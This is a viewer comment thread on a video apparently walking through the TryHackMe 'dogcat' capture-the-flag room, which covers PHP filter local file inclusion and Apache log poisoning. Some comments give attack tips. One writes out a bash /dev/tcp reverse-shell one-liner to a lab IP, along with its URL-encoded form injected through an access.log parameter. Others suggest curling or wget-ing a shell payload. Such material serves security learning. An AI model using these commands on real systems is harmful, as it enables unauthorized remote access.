TryHackMe! DOGCAT - PHP Filters for Local File Inclusion
Vložit
- čas přidán 28. 08. 2024
- If you would like to support me, please like, comment & subscribe, and check me out on Patreon: / johnhammond010
E-mail: johnhammond010@gmail.com
PayPal: paypal.me/johnh...
GitHub: github.com/Joh...
Site: www.johnhammond...
Twitter: / _johnhammond
Real talk, I learn more from John's videos than I do from any kind of infosec "course". Absolutely brilliant stuff.
Yeah, this stuff is really useful!
Your vids with your first attempt are my favorite. I enjoy watching you get stumped for a bit and figuring out the next avenue. Thanks for expanding my mind on a regular basis.
I so much love the way you explain and how you try several methods. The video is very relatable showing that we are allowed to try and fail and try again.. very very cool specially the Recap in the end. Thanks so much ! 🙏🏻
Ah that is very sweet, thank YOU! Appreciate all the kind words, thanks for watching!
Great playlist so far! One of the best learning experiences I've had so far in this field. Everyone else appears to have practiced every box multiple times before streaming. So if we face any issues at all (as they probably did behind screens) we're in the sinker. However, showing the mistakes and the steps to get around or out of any situation is priceless in my opinion. As it shows the method of thinking behind diagnosing what the issue is and what routes you can take to rectify the situation as a professional does. Keep up the great work man!
Can you make a video where you haven't done a tryhackme box in advance? I like watching you go through the problem solving part instead of just showing how you did it before.
I might start to do some stuff like that on Twitch, so I can fumble and fail and not be too concerned with it. Would that work?
@@_JohnHammond yeah I would definitely watch that!
@@_JohnHammond that would be great! :D
i like this quick highlight of the solution you figured out if i like the highlights i will go to twitch to watch the whole thing, so please keep uploading highlights here, great job.
@@_JohnHammond I really enjoyed the one you did on May 20th, I was a little disappointed because I missed it when it was live.
*script finishes in a minute* "It has finished in just under a hour." Interpret howerever you like.
Haha yes
Whoops! I don't even know what I say when I do these things bahaha
oHHHHHH, this got me confused
LOL! I kinda did a lazy double take on that one
@21:00 It removes the whitespace, because in the Python code you have x.strip(), if you remove strip() function you will get the PHP file with whitespaces in it.
I also had to do some utf-8 encoding/decoding before sending it to the server (although I think that's not really important i think), and it worked!
Thanks for the great content
this is some good stuff
Terminal: [Finished in 56.9 s]
Hammond: Finished in just under an hour...
Ah jeez. I don't even know what I say when recording. Bahahah
@@_JohnHammond i felt bad cuz it didn't work and i thought it genuinely took an hour
I like it even more if you don't know the answer right away, seeing you wander in the dark makes me learn a lot.
I know it's an old video, but I've been trying to do this CTF all day. Watching other videos, and reading write-ups on this exact one. I couldn't get anything else working until I found your video. I kept breaking my apache logs like you explained.
Anyway, good stuff. Keep it up man.
Loving the videos. Just caught the bug. Loving the fact names that John gives to symbols even more ( '
That was one of my favorite video you did, awesome learned a lot from it, Thank you for sharing
I was doing similar box yesterday and spent the whole day learning the log poisoning technique (even tho got it working at the end but wasn't fully understand why).
Only if I watch this video yesterday then I could have save a day worth of researching.
Your video are awesome and very informative for beginner/hobbyist . Looking forward to learn more from you :)
You could use the php $_GET to curl a reverse shell from your own machine and pipe that to php to get a shell
That thumbnail doe!! 🔥
Code execution using the log file and the user agent is mind-blowing! Where the hell do you find those solutions??
I love the way how you "hackers" think outside de box, you are really genius guys!
I love the way this guy navigates thru the OS. I have Ubuntu, Kali and Windows 10. lol Trying to mastering 3 at the sametime.
this guy is the real deal
Half the time I don’t know what’s going on but its entertaining watching him hack things with such ease
Just a quick question because I'm not sure what I'm missing: why not just send the whole file over in one request as base64 instead of sending it as individual lines?
the big inspirator thxxx jhonn
nooo, what happend with the original one, i watched you make it for hours.
16:37 What's the purpose of base64 encoding? You can write text into a file so what's the issue?
so he can escape special characters
I love your Python coding in the Videos
Beginner question: Why do you need to base64 encode it and than after you've uploaded it, decode again? Some source why you have to do this ?
Dude i am learning so much from you.. Thanks 🙏🙇
Amazing video, very entertained, you are a genius, a total code and hacking wizard
I did this room today and had a bumpy ride, then I watched this video and saw you struggle with some of the same things which was kind of nice to be honest 😅
I really enjoyed the tutorial and I thought the "mishaps" were actually educational.
awesome content keep up the great work
This room gave me a hard time
Love your videos. Love From Bangladesh ❤
Very cool as always thanks for making this stuff really helps noobs like me :)
Haha why noob :)
what the hell this is medium difficulty??
John you don't need to have python. You can also type 'bash -i'
Really Great !!!
Cant wait
that is huge man
Great stuff!
I checkout if it possible on my apache2 server or if is fixed already...that is scary!
Tha was a nice one
Pretty sure the & doesnt get url encoded when you put it in the url which breaks stuff so thats probably why the reverse shell wasnt working
Protip, urlencoding the first payload you tried 'bash ×××××××' works.
Oh NICE! Good to know, thank you!
Hi, can you pls provide how urlencoding worked for you?
I tried encoding "bash -i >& /dev/tcp/10.1.12.155/9001 0>&1" and got:
..access.log&ext&c=bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.1.12.155%2F9001+0%3E%261
But no go :( , nc lvnp did not respond.
Thanks!
Cool thing
I keep getting a "fatal flaw" error when accessing the access.log. Anyone else?
How did you know when it was broken, just because it wasn't receiving the variable?, I make a mistake writing the code for that, but it was difficult to spot it, since it do not say any error, the variable just didn't receive any value so didn't show me anything, it did show me the part of : system(): Cannot execute a blank command in so I thought everything was done right and didn't knew i wrote the code wrong was it the same for you or did it show something for you?, thanks for your tutorials they are nice!
Great job. How would you rate the difficulty of this box with the ones on the oscp?
This is a box based on one technique for escalating to rce from lfi. There are tons of techniques to turn lfi to rce. Sometimes through sending a mail to a smtp server with php codes too. This is like 10% of a single oscp exam box. But if you really curious about difficulty of oscp labs and exam boxes. They are easy-medium boxes of hackthebox.
Ok sorry if this question seems very dumb but I'm just trying to learn, would it be possible to use a tool like gobuster to find the "hidden" addresses on the page? instead of manually looking for them?
Yes it would. There's more than one way to skin a cat.
You're a fucking beast, love it
Why do you prefer Sublime Text over VS Code?
My guess is that everyone who did the box broke the access.log atleast one time lol
this shell doesn't work in pentestbox do you know any way to do it?return the error 101
An hour?? A minute looking at your clock
that was epic 😎
I really wanna learn this but no idea where to start. I once downloaded Kali a long time ago, but yeah, no idea what I was doing. :D I've always been on Win machines also, so don't know any code etc. I know basic. ls, dir, cd.. And is it still safe to install Kali(and probably a vm)
thanks bro ,, but i hope to upload scripts file that related with yours videos .
can you do the skynet room on tryhackme? would be appreciated?
'Comment button'
you tried a lot, but the reverse shell upload is not that hard in this machine.
watching this video makes me feel like a hacker, even though i never used linux 🤣
11:50 it may have worked with python, you did (“)” instead of (“”)
That's was hard (for me)
since you have a rce on that box, why not upload any shell source on a text hosting site like pastebin then curl/wget that file to that box xD
❤🤚
Wow Good jop 🎉🎉🎉
Try perl rev shell
Wizard
The amount of time someone like John spent on it, the amount of coding involved and techniques used, makes me suspect that this is shouldnt be classified as an "easy" room on THM lol
same wtf is that